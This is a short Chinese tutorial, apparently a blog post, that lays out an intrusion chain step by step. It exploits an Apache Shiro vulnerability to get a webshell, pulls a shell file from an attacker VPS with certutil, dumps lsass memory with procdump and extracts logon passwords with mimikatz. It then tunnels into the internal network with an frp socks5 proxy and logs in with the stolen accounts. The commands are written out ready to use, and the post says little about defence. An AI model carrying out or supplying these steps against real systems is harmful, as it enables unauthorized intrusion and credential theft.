如何理解滲透測試流程：getshell，內(nèi)存提取密碼，內(nèi)網(wǎng)滲透

本篇內(nèi)容介紹了“如何理解滲透測試流程：getshell，內(nèi)存提取密碼，內(nèi)網(wǎng)滲透”的有關(guān)知識(shí)，在實(shí)際案例的操作過程中，不少人都會(huì)遇到這樣的困境，接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧！希望大家仔細(xì)閱讀，能夠?qū)W有所成！

思路：

通過shiro框架漏洞拿到webshell——上傳相關(guān)工具procdump.exe讀取內(nèi)存并導(dǎo)出為dmp文件——使用mimikatz進(jìn)行密碼破解——用frp進(jìn)行反向代理——使用破解的賬戶密碼登錄服務(wù)器。

測試過程：

通過shiro工具進(jìn)行測試：關(guān)于shiro和工具參考：https://www.cnblogs.com/xiaozi/p/13239046.html

獲取webshell,有些時(shí)候如果獲取不到可以通過遠(yuǎn)程下載的辦法下載shell:certutil -urlcache -split -f http://vps/evil.txt test.jsp

上傳procdump.exe

下載地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

執(zhí)行命令：procdump64.exe -accepteula -ma lsass.exe

說明：lsass.exe是windows系統(tǒng)的一個(gè)重要進(jìn)程，里面存著（登錄過的）系統(tǒng)賬戶和密碼

把dmp文件下載下來，使用mimikatz進(jìn)行密碼破解：

先導(dǎo)入dmp文件，命令：sekurlsa::minidump lass*.dmp

讀取賬戶密碼，命令：sekurlsa::logonpasswords

然后搭建frp梯子：

實(shí)戰(zhàn)還是多用用plugin = socks5,這個(gè)參數(shù)可以幫你進(jìn)行全局代理。

用拿到的賬號(hào)密碼登錄服務(wù)器：

“如何理解滲透測試流程：getshell，內(nèi)存提取密碼，內(nèi)網(wǎng)滲透”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注億速云網(wǎng)站，小編將為大家輸出更多高質(zhì)量的實(shí)用文章！